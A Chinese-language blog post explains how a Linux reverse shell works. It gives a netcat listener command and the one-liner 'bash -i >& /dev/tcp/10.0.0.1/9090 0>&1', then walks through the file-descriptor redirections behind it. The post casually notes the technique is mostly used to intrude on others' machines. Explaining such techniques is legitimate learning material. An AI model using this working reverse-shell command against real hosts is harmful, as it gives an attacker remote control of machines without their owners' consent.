关于Linux的反弹shell命令的解析
今天在看spark stream的sample样例的时候看到linux的万金油命令nc。搜索相关的内容突然发现一个很好玩的用处就是反弹shell.下面我们就来讲讲反弹shell
1. 什么是反弹shell
简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。
2. 反弹shell的用途
这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙
3. 反弹shell操作步骤
3.1. 在本机开启端口9090
nc -lk 9090
3.2. 在需要被控制的机器上执行如下两种命令中的一种即可
bash -i >& /dev/tcp/10.0.0.1/9090 0>&1
3.3. 在本机刚才执行nc -lk 9090命令行下面输入需要被控制的主机的命令即可
4. 原理
- A主机开启9090端口的tcp服务
- B主机连接到A主机的9090的tcp服务
- A主机通过tcp服务把命令发到B主机
- B主机读取命令并且在bash中执行
- B主机把执行结果发给A主机
这样就可以在A主机中'玩弄'B主机了
下面重点来了
我们看这个操作其实还是蛮简单的,但是我们不能只局限于表面。我们需要去了解它的原理
其实nc -lk 9090命令没什么可说的,百度google一搜就出来了。我们今天要去解释的是bash -i >& /dev/tcp/10.0.0.1/9090 0>&1。这条命令在google也没搜出来什么结果。所以只能自己加夜班搞了。
inux shell下常用的文件描述符是:
- 标准输入 (stdin) :代码为 0 ,使用 < 或 << ;
- 标准输出 (stdout):代码为 1 ,使用 > 或 >> ;
- 标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>。
首先我们把这个命令拆解一下
bash -i # 这个也不知道说啥 >& # 这条命令 其实就是把stderr也输入到 stdout。它相当于 `> xxx 2>&1` /dev/tcp/10.0.0.1/9090 # 这个就是连接到10.0.0.1的9090端口 0>&1 # 这个在google百度上查了半天也没搞懂,只能去研究文档
其实前面3个命令组合在一起很好理解,就是把这个bash下的所有输出都发送到 10.0.0.1:9090。这个大家可以自己操作一下,去掉后面的 0>&1。
我们在命令里面写 2>&1都很好理解,就是把error重定向到stdout。但是0>&1好像不太好理解,我们看下文件描述符
这里看到的是2>&1就是把文件描述符2对应的设备改成了文件描述符1对应的设备。那么同理 0>&1就是把 0对应的设备改成的1对应的设备,那也就是socket。这就表明了 stdin就是从socket中读取数据,然后再执行命令,把bash的命令行返回内容通过stdout发到socket。
其实这些内容都可以在bash的man pages里面找到
文档里面写的很清楚 n<&word 是吧word复制给n, n>&word是吧word复制给n。